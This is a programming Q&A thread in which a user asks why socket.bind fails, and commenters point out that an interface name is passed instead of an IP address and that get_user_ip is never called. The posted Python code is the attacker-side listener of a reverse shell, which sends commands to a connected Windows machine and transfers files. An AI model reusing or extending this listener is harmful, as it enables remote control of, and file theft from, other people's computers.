# "OSError: [Errno 99] Cannot assign requested address" error

Tags: python, python-3.x, sockets

```
import socket
import base64
import simplejson
import optparse
import subprocess
import sys

class SocketListener:
    def __init__(self, ip, port):
        self.user_ip = ip
        self.port_to_listen = port
        my_listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        my_listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        my_listener.bind((ip, port))
        my_listener.listen(1)
        print("Listening...")
        (self.my_connection, my_address) = my_listener.accept()
        print("Connection OK from " + str(my_address))

    def get_user_ip(self):
        ip_addr_process = subprocess.Popen(["ifconfig", self.interface], stdout=subprocess.PIPE)
        output, error = ip_addr_process.communicate()

        for line in output.decode().split("\n"):
            if "inet" in line and "netmask" in line:
                self.user_ip = line.split()[1]

        return self.user_ip

    def json_send(self, data):
        json_data = simplejson.dumps(data)
        self.my_connection.send(json_data.encode("utf-8"))

    def json_receive(self):
        json_data = ""
        while True:
            try:
                json_data += self.my_connection.recv(1024).decode()
                return simplejson.loads(json_data)
            except ValueError:
                continue

    def command_execution(self, command_input):
        self.json_send(command_input)

        if command_input[0] == "quit":
            self.my_connection.close()
            sys.exit()

        return self.json_receive()

    def save_file(self, path, content):
        with open(path, "wb") as my_file:
            my_file.write(base64.b64decode(content))
            return "Download OK!"

    def read_file(self, path):
        with open(path, "rb") as my_file:
            return base64.b64encode(my_file.read())

    def start_listener(self):
        while True:
            command_input = input("Enter command:")
            command_input = command_input.split(" ")
            try:
                if command_input[0] == "upload":
                    my_file_content = self.read_file(command_input[1])
                    command_input.append(my_file_content)

                command_output = self.command_execution(command_input)

                if command_input[0] == "download" and "Error!" not in command_output:
                    command_output = self.save_file(command_input[1], command_output)
            except Exception:
                command_output = "Error!"

            print(command_output)

def get_user_input():
    parse_object = optparse.OptionParser()

    parse_object.add_option("--interface", dest="interface", help="Please enter your interface: ")
    parse_object.add_option("--port", dest="port", help="Please enter the port to be listened to:")

    options, _ = parse_object.parse_args()

    if not options.interface:
        print("Please enter your interface.")
        sys.exit()

    if not options.port:
        print("Please enter the port to be listened to.")
        sys.exit()

    return options.interface, int(options.port)

if __name__ == "__main__":
    interface, port = get_user_input()
    my_socket_listener = SocketListener(interface, port)
    my_socket_listener.start_listener()
```

I cant understand why ı am getting this error. I think this class's are hard thing to learn.I'm entering to linux "python test.py --interface eth0 --port 8080" and i'm getting this error

```
Traceback (most recent call last):
  File "/root/PycharmProjects/PortScanner/test.py", line 99, in <module>
    my_socket_listener = SocketListener(interface, port)
                         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/root/PycharmProjects/PortScanner/test.py", line 14, in __init__
    my_listener.bind((ip, port))
OSError: [Errno 99] Cannot assign requested address"
```

I expected to listen windows from kali linux. Actually i could but i want to do my code more automatic so i did these but i'm getting error.

Comment: `eth0` is not an IP address.  You don't specify the port by interface name, you specify it by IP address.  You can type `ip addr` to look that up.  And why are you running as root?  That's very bad practice.

Comment: Like i said im want to make it automated so with interface im calling "ifconfig eth0" and from output by extracting im getting ip. I dont still get what im doing wrong.

Comment: You're never calling `get_user_ip()`. You also never set `self.interface`.

Comment: You have code to call `ifconfig`, but you never call that function.  Specifying the interface is simply not a good practice.  A single interface can have multiple IP addresses.  You should have the user specify the IP address.